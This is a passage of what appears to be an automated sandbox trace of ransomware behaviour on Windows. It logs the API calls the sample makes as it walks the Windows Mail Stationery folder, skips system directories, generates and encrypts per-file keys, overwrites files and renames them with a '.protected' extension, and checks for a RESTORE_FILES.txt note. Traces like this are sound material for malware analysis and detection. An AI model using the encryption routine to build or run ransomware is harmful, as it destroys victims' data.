mail\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\desktop.ini.protected")) returned 1 [0094.541] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="Windows") returned -1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files") returned -1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="Program Files (x86)") returned -1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="$Recycle.bin") returned 1 [0094.541] lstrcmpiW (lpString1="Garden.htm", lpString2="System Volume Information") returned -1 [0094.541] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.541] StrStrIW (lpFirst="Garden.htm", lpSrch=".protected") returned 0x0 [0094.541] lstrcmpW (lpString1="Garden.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.541] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.542] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.542] StrStrW (lpFirst="Garden.htm", lpSrch=".txt") returned 0x0 [0094.542] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.542] StrStrW (lpFirst="Garden.htm", lpSrch=".rar") returned 0x0 [0094.542] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 79 [0094.542] StrStrW (lpFirst="Garden.htm", lpSrch=".zip") returned 0x0 [0094.542] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0094.543] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.543] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xe7, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xe7, lpOverlapped=0x0) returned 1 [0094.543] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.543] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.544] CloseHandle (hObject=0x150) returned 1 [0094.544] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected") returned 89 [0094.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm.protected")) returned 1 [0094.544] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="Windows") returned -1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files") returned -1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="Program Files (x86)") returned -1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="$Recycle.bin") returned 1 [0094.544] lstrcmpiW (lpString1="Garden.jpg", lpString2="System Volume Information") returned -1 [0094.544] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.544] StrStrIW (lpFirst="Garden.jpg", lpSrch=".protected") returned 0x0 [0094.545] lstrcmpW (lpString1="Garden.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.545] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.545] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.546] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.546] StrStrW (lpFirst="Garden.jpg", lpSrch=".txt") returned 0x0 [0094.547] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.547] StrStrW (lpFirst="Garden.jpg", lpSrch=".rar") returned 0x0 [0094.547] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 79 [0094.547] StrStrW (lpFirst="Garden.jpg", lpSrch=".zip") returned 0x0 [0094.547] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.548] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.548] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0094.548] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.548] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.550] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.550] CloseHandle (hObject=0x150) returned 1 [0094.550] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected") returned 89 [0094.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg.protected")) returned 1 [0094.550] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Windows") returned -1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files") returned -1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="Program Files (x86)") returned -1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="$Recycle.bin") returned 1 [0094.551] lstrcmpiW (lpString1="Green Bubbles.htm", lpString2="System Volume Information") returned -1 [0094.551] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrIW (lpFirst="Green Bubbles.htm", lpSrch=".protected") returned 0x0 [0094.551] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.551] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.551] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".txt") returned 0x0 [0094.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".rar") returned 0x0 [0094.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 86 [0094.551] StrStrW (lpFirst="Green Bubbles.htm", lpSrch=".zip") returned 0x0 [0094.551] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.552] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.552] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0094.552] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.552] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.552] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.552] CloseHandle (hObject=0x150) returned 1 [0094.552] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected") returned 96 [0094.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm.protected")) returned 1 [0094.553] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Windows") returned -1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files") returned -1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="Program Files (x86)") returned -1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="$Recycle.bin") returned 1 [0094.553] lstrcmpiW (lpString1="GreenBubbles.jpg", lpString2="System Volume Information") returned -1 [0094.553] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.553] StrStrIW (lpFirst="GreenBubbles.jpg", lpSrch=".protected") returned 0x0 [0094.553] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.553] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.553] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.554] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".txt") returned 0x0 [0094.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.554] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".rar") returned 0x0 [0094.554] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 85 [0094.554] StrStrW (lpFirst="GreenBubbles.jpg", lpSrch=".zip") returned 0x0 [0094.554] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0094.556] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.556] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x1906, lpOverlapped=0x0) returned 1 [0094.556] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.556] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.556] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.556] CloseHandle (hObject=0x150) returned 1 [0094.556] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected") returned 95 [0094.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg.protected")) returned 1 [0094.557] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Windows") returned -1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files") returned -1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="Program Files (x86)") returned -1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="$Recycle.bin") returned 1 [0094.557] lstrcmpiW (lpString1="Hand Prints.htm", lpString2="System Volume Information") returned -1 [0094.557] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.557] StrStrIW (lpFirst="Hand Prints.htm", lpSrch=".protected") returned 0x0 [0094.557] lstrcmpW (lpString1="Hand Prints.htm", lpString2="RESTORE_FILES.txt") returned -1 [0094.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.558] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".txt") returned 0x0 [0094.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.558] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".rar") returned 0x0 [0094.558] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 84 [0094.558] StrStrW (lpFirst="Hand Prints.htm", lpSrch=".zip") returned 0x0 [0094.558] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0094.558] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.559] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0xeb, lpOverlapped=0x0) returned 1 [0094.559] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.559] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.559] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.559] CloseHandle (hObject=0x150) returned 1 [0094.559] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected") returned 94 [0094.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm.protected")) returned 1 [0094.562] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Windows") returned -1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files") returned -1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="Program Files (x86)") returned -1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="$Recycle.bin") returned 1 [0094.562] lstrcmpiW (lpString1="HandPrints.jpg", lpString2="System Volume Information") returned -1 [0094.562] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.562] StrStrIW (lpFirst="HandPrints.jpg", lpSrch=".protected") returned 0x0 [0094.562] lstrcmpW (lpString1="HandPrints.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0094.562] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.563] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.563] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".txt") returned 0x0 [0094.563] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.563] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".rar") returned 0x0 [0094.563] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0094.563] StrStrW (lpFirst="HandPrints.jpg", lpSrch=".zip") returned 0x0 [0094.563] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0094.565] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffef82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.565] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x107e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x107e, lpOverlapped=0x0) returned 1 [0094.565] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.565] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.565] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.565] CloseHandle (hObject=0x150) returned 1 [0094.565] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 